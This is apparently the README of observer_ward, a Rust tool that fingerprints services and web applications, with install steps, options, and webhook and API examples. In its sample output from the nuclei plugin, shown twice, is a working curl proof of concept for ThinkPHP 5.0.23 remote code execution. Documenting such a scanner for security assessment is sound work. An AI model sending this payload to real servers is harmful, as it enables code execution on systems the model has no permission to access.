observer_ward

Contributors Forks Stargazers Issues MIT License


Logo

observer_ward(侦查守卫)

服务和Web应用指纹识别工具
View Demo · Report Bug · Request Feature

关于这个项目

类别 说明
作者 三米前有蕉皮
团队 0x727 未来一段时间将陆续开源工具
定位 社区化指纹库识别工具。
语言 Rust
功能 服务和Web应用指纹识别工具

Product Name Screen Shot

(back to top)

安装

源码安装

cargo build --release --manifest-path=observer_ward/Cargo.toml

二进制安装

使用Mac系统brew安装

brew install observer_ward

Docker镜像

➜ docker run --rm -it kaliteam/observer_ward -t http://172.17.0.2
[INFO ] probes loaded: 2223
[INFO ] optimized probes: 7
[INFO ] target loaded: 1
|_uri:[ http://172.17.0.2/ [apache-http]  <> (200 OK) ]
|_uri:[ http://172.17.0.2/ [thinkphp]  <> (200 OK) ]
➜  docker run --rm -it kaliteam/observer_ward:nuclei -t http://172.17.0.2 --plugin default
[INFO ] probes loaded: 2223
[INFO ] optimized probes: 7
[INFO ] target loaded: 1
|_uri:[ http://172.17.0.2/ [apache-http]  <> (200 OK) ]
|_uri:[ http://172.17.0.2/ [thinkphp]  <> (200 OK) ]
 |_exploitable: [Critical] thinkphp-5023-rce: ThinkPHP 5.0.23 - Remote Code Execution
  |_matched_at: http://172.17.0.2/index.php?s=captcha
  |_shell: curl -X 'POST' -d '_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1' -H 'Accept: */*' -H 'Accept-Language: en' -H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.3.23' 'http://172.17.0.2/index.php?s=captcha'

入门

➜  ~ ./observer_ward -u
➜  ~ ./observer_ward -t http://httpbin.org/
[INFO ] 📇probes loaded: 6183
[INFO ] 🎯target loaded: 1
[INFO ] 🚀optimized probes: 8
🎯:[ http://httpbin.org/ [0example,swagger]  <httpbin.org> (200 OK) ]
➜ ./observer_ward --help                                                                      
Usage: observer_ward [-l <list>] [-t <target...>] [-p <probe-path>] [--probe-dir <probe-dir...>] [--ua <ua>] [--mode <mode>] [--timeout <timeout>] [--thread <thread>] [--proxy <proxy>] [--ir] [--ic] [--plugin <plugin>] [-o <output>] [--format <format>] [--no-color] [--nuclei-args <nuclei-args...>] [--silent] [--debug] [--config-dir <config-dir>] [--update-self] [-u] [--update-plugin] [--daemon] [--token <token>] [--webhook <webhook>] [--webhook-auth <webhook-auth>] [--api-server <api-server>]

observer_ward

Options:
  -l, --list        multiple targets from file path
  -t, --target      the target (required)
  -p, --probe-path  customized fingerprint json file path
  --probe-dir       customized fingerprint yaml file dir
  --ua              customized ua
  --mode            mode probes option[tcp,http,all] default: all
  --timeout         set request timeout.
  --thread          number of concurrent threads.
  --proxy           proxy to use for requests
                    (ex:[http(s)|socks5(h)]://host:port)
  --ir              include request/response pairs in output
  --ic              include certificate pairs in output
  --plugin          customized template dir
  -o, --output      export to the file
  --format          output format option[json,csv,txt] default: txt
  --no-color        disable output content coloring
  --nuclei-args     poc nuclei engine additional args
  --silent          silent mode
  --debug           debug mode
  --config-dir      customized template dir
  --update-self     update self
  -u, --update-fingerprint
                    update fingerprint
  --update-plugin   update plugin
  --daemon          api background service
  --token           api Bearer authentication
  --webhook         send results to webhook server
                    (ex:https://host:port/webhook)
  --webhook-auth    the auth will be set to the webhook request header
                    AUTHORIZATION
  --api-server      start a web API service (ex:127.0.0.1:8080)
  --help            display usage information
参数名 作用和描述
-l,–list 从文件中读取目标列表,一行一个目标
-t,–target 单个或者多个目标
-p,–probe json探针路径(如果和--probe-dir一起使用,该参数为转换json后的输出文件路径)
–probe-dir yaml探针目录(如果和--probe一起使用,会读取该目录下的全部yaml文件转换为一个json文件)
–ua 设置请求头
–mode 模式:safe和danger,safe只请求首页,dranger会请求特殊路径,容易被waf拦截
–timeout 请求和连接超时,单位为秒
–thread 同时识别的线程数,默认为cpu的核数
–proxy 设置代理服务器,支持http和socks5,例如:https://username:password@your-proxy.com:port
–ir 在json结果中保存请求和响应,保存请求响应可能比较消耗内存
–ic 在json结果中保存证书数据
–plugin 指定nuclei插件路径,会开启nuclei验证漏洞,如果路径为default默认调用配置文件夹下的plugins目录
-o,–output 将结果保存到文件,如果文件后缀名是下面格式支持的可以省略--format参数
–format 输出格式:支持jsoncsvtxt,在保存文件的时候会根据文件后缀自动识别
–no-color 禁用颜色输出
–nuclei-args nuclei的额外参数,会按照空格分割追加到调用nuclei参数,例如:-es info,排除info插件
–silent 静默模式,不打印任何信息,常用在命令行管道作为输入源
–debug 开启调试模式,会输出更多信息,包括请求和响应,提取到的图标哈希,nuclei调用命令行等信息
–config-dir 指定配置文件夹,默认在用户配置文件夹下的observer_ward目录
–update-self 更新程序自身版本,也就是该项目的defaultv4发布标签
-u,–update-fingerprint 更新指纹到配置文件夹,会覆盖web_fingerprint_v4.json文件
–update-plugin 更新社区nuclei插件到配置文件夹,会自动解压zip并且覆盖plugins目录
–daemon api服务后台运行,window不支持
–token api服务认证token
–webhook 要将识别结果通过webhook发送到指定url
–webhook-auth webhook的AUTHORIZATION认证
–api-server api监听地址的端口
–help 打印帮助信息

更新指纹库

➜ ./observer_ward -u
操作系统 保存路径
Windows C:\Users\Alice\AppData\Roaming\observer_ward\web_fingerprint_v4.json
Linux /home/alice/.config/observer_ward/web_fingerprint_v4.json
macOS /Users/Alice/Library/Application Support/observer_ward/web_fingerprint_v4.json
➜ ./observer_ward --probe-dir web_fingerprint --probe-dir service_fingerprint/null -p fingerprint_v4.json
[INFO ] ℹ️ convert the 6183 yaml file of the probe directory to a json file fingerprint_v4.json
➜ ~ ./observer_ward --probe-dir FingerprintHub/service-fingerprint/null -p .config/observer_ward/service_fingerprint_v4.json
[INFO ] ℹ️ convert the 3960 yaml file of the probe directory to a json file .config/observer_ward/service_fingerprint_v4.json

调试模式

```bash,no-run ➜ ./observer_ward -t http://httpbin.org -p observer_ward/examples/json.yaml --debug [INFO ] 📇probes loaded: 1 [INFO ] 🎯target loaded: 1 [INFO ] 🚀optimized probes: 1 [DEBUG] start: http://httpbin.org/ [DEBUG] Request { uri: http://httpbin.org/ip, version: HTTP/1.1, method: GET, headers: { "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "content-type": "application/json", }, body: None, raw_request: None, } [DEBUG] Response { version: HTTP/1.1, uri: http://httpbin.org/ip, status_code: 200, headers: { "date": "Mon, 08 Jul 2024 13:19:59 GMT", "content-type": "application/json", "content-length": "32", "connection": "keep-alive", "server": "gunicorn/19.9.0", "access-control-allow-origin": "*", "access-control-allow-credentials": "true", }, extensions: Extensions, body: Some( { "origin": "1.1.1.1" } , ), } [DEBUG] end: http://httpbin.org/ 🎯:[ http://httpbin.org/] 🎯:[ http://httpbin.org/ip [httpbin-ip] <>] |_📰: ip:["1.1.1.1"] ```

(back to top)

目标输入

➜  ~ ./observer_ward -t https://www.example.com/ -t http://httpbin.org                                            
[INFO ] 📇probes loaded: 6183
[INFO ] 🎯target loaded: 2
[INFO ] 🚀optimized probes: 8
🎯:[ https://www.example.com/ <Example Domain>  (200 OK) ]
🎯:[ http://httpbin.org/ [0example,swagger]  <httpbin.org> (200 OK) ]
➜  ~ ./observer_ward -l target.txt                                            
[INFO ] 📇probes loaded: 6183
[INFO ] 🎯target loaded: 3
[INFO ] 🚀optimized probes: 8
🎯:[ tcp://127.0.0.1:22/ [ssh]  <SSH-2.0-OpenSSH_9.7>]
 |_📰: version:[9.7] info:[protocol 2.0] 
🎯:[ http://172.17.0.2/ [apache-http]  <>]
🎯:[ http://172.17.0.2/ [thinkphp]  <>]
🎯:[ http://httpbin.org/ [swagger,0example]  <httpbin.org> (200 OK) ]
➜  ~ echo http://172.17.0.2 | ./observer_ward        
[INFO ] 📇probes loaded: 6183
[INFO ] 🚀optimized probes: 8
[INFO ] 🎯target loaded: 1
🎯:[ http://172.17.0.2/ [apache-http]  <>]
🎯:[ http://172.17.0.2/ [thinkphp]  <>]

(back to top)

结果输出

➜  ~ ./observer_ward -t https://www.example.com/ -o output.txt
[INFO ] 📇probes loaded: 6183
[INFO ] 🚀optimized probes: 8
[INFO ] 🎯target loaded: 1
➜  ~ cat output.txt 
🎯:[ https://www.example.com/ <Example Domain>  (200 OK) ]
➜  ~ ./observer_ward -t https://httpbin.org/  -o output.json
[INFO ] 📇probes loaded: 6183
[INFO ] 🚀optimized probes: 8
[INFO ] 🎯target loaded: 1
➜  ~ cat output.json 
{"https://httpbin.org/":{"title":["httpbin.org"],"status":200,"favicon":{"https://httpbin.org/static/favicon.ico":{"md5":"3aa2067193b2ed83f24c30bd238a717c","mmh3":"-1296740046"}},"name":["swagger"],"fingerprints":[{"matcher-results":[{"template":"swagger","info":{"name":"swagger","author":"cn-kali-team","tags":"detect,tech,swagger","severity":"info","metadata":{"product":"swagger","vendor":"00_unknown","verified":true}},"matcher-name":["swagger-ui.css"],"extractor":{}}],"matched-at":"https://httpbin.org/"}],"nuclei":{}}}
➜  ~ ./observer_ward_amd64 -t http://172.17.0.2 --format json --ir --ic --silent |jq
from flask import Flask, request

app = Flask(__name__)


@app.route("/webhook", methods=['POST'])
def observer_ward_webhook():
    print("Authorization: ", request.headers.get("Authorization"))
    print(request.json)
    return 'ok'


if __name__ == '__main__':
    app.run()
➜  observer_ward git:(main) ✗ python observer_ward/examples/webhook.py
 * Serving Flask app 'webhook'
 * Debug mode: off
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on http://127.0.0.1:5000
Press CTRL+C to quit
➜  ~ ./observer_ward -t http://httpbin.org --webhook http://127.0.0.1:5000/webhook --webhook-auth 22e038328151a7a06fd4ebfa63a10228
[INFO ] 📇probes loaded: 6183
[INFO ] 🚀optimized probes: 8
[INFO ] 🎯target loaded: 1
🎯:[ http://httpbin.org/ [swagger,0example]  <httpbin.org> (200 OK) ]

(back to top)

更新nuclei插件

集成nuclei验证漏洞

➜  ~ ./observer_ward -t http://172.17.0.2/ --plugin default
[INFO ] 📇probes loaded: 6183
[INFO ] 🚀optimized probes: 8
[INFO ] 🎯target loaded: 1
🎯:[ http://172.17.0.2/ [apache-http]  <>]
🎯:[ http://172.17.0.2/ [thinkphp]  <>]
 |_🐞: [Critical] thinkphp-5023-rce: ThinkPHP 5.0.23 - Remote Code Execution
  |_🔥: http://172.17.0.2/index.php?s=captcha
  |_🐚: curl -X 'POST' -d '_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1' -H 'Accept: */*' -H 'Accept-Language: en' -H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15 Ddg/17.4' 'http://172.17.0.2/index.php?s=captcha'

开启Web服务

➜  ~ ./observer_ward --api-server 127.0.0.1:8000 --token 22e038328151a7a06fd4ebfa63a10228
[INFO ] 📇probes loaded: 6183
[INFO ] 🚀optimized probes: 8
[INFO ] 🌐API service has been started: http://127.0.0.1:8000/v1/observer_ward
[INFO ] 📔:curl --request POST \
      --url http://127.0.0.1:8000/v1/observer_ward \
      --header 'Authorization: Bearer 22e038328151a7a06fd4ebfa63a10228' \
      --json '{"target":["https://httpbin.org/"]}'
[INFO ] 🗳:[result...]
➜  ~ curl --request POST \                                                                                                     
  --url http://127.0.0.1:8000/v1/observer_ward \
  --header 'Authorization: Bearer 22e038328151a7a06fd4ebfa63a10228' \
  --json '{"target":["https://httpbin.org/"]}'
{"https://httpbin.org/":{"title":["httpbin.org"],"status":200,"favicon":{"https://httpbin.org/static/favicon.ico":{"md5":"3aa2067193b2ed83f24c30bd238a717c","mmh3":"-1296740046"}},"name":["swagger"],"fingerprints":[{"matcher-results":[{"template":"swagger","info":{"name":"swagger","author":"cn-kali-team","tags":"detect,tech,swagger","severity":"info","metadata":{"product":"swagger","vendor":"00_unknown","verified":true}},"matcher-name":["swagger-ui.css"],"extractor":{}}],"matched-at":"https://httpbin.org/"}],"nuclei":{}}}
➜  ~ curl --request GET \
  --url http://127.0.0.1:8000/v1/config \
  --header 'Authorization: Bearer 22e038328151a7a06fd4ebfa63a10228' \
  --header 'Content-Type: application/json'
{"target":[],"ua":"Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0","timeout":10,"thread":4,"ir":false,"ic":false,"update-fingerprint":false,"update-plugin":false,"webhook":null,"webhook-auth":null}
➜  ~ curl --request POST \
  --url http://127.0.0.1:8000/v1/config \
  --header 'Authorization: Bearer 22e038328151a7a06fd4ebfa63a10228' \
  --json '{"target":[],"update-plugin":true,"update-fingerprint":true}'
{"target":[],"ua":"Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0","timeout":10,"thread":4,"ir":false,"ic":false,"update-fingerprint":true,"update-plugin":true,"webhook":null,"webhook-auth":null
➜  ~ ./observer_ward --api-server /tmp/observer_ward.socket
[INFO ] 📇probes loaded: 6183
[INFO ] 🚀optimized probes: 8
[INFO ] 🌐API service has been started: /tmp/observer_ward.socket
[INFO ] 📔:curl --request POST \
      --unix-socket /tmp/observer_ward.socket \
      --url http://localhost/v1/observer_ward \
      --header 'Authorization: Bearer 22e038328151a7a06fd4ebfa63a10228' \
      --json '{"target":["https://httpbin.org/"]}'
[INFO ] 🗳:[result...]

提交指纹

为observer_ward做贡献

提交代码

git clone git@github.com:你的个人github用户名/observer_ward.git
cd observer_ward
git remote add upstream git@github.com:emo-crab/observer_ward.git
git fetch upstream
git config --global user.name "$GITHUB_USERNAME"
git config --global user.email "$GITHUB_EMAIL"
git config --global github.user "$GITHUB_USERNAME"
git fetch --all
git fetch upstream
git checkout -b dev
git add 你添加或者修改的文件名
git commit -m "添加你的描述"
git push origin dev

(back to top)

License

Distributed under the GPL-3.0-only License. See LICENSE for more information.

(back to top)

Contact

Your Name - @Kali_Team - root@kali-team.cn

Project Link: https://github.com/emo-crab/observer_ward

(back to top)

Acknowledgments

(back to top)

Stargazers over time

Stargazers over time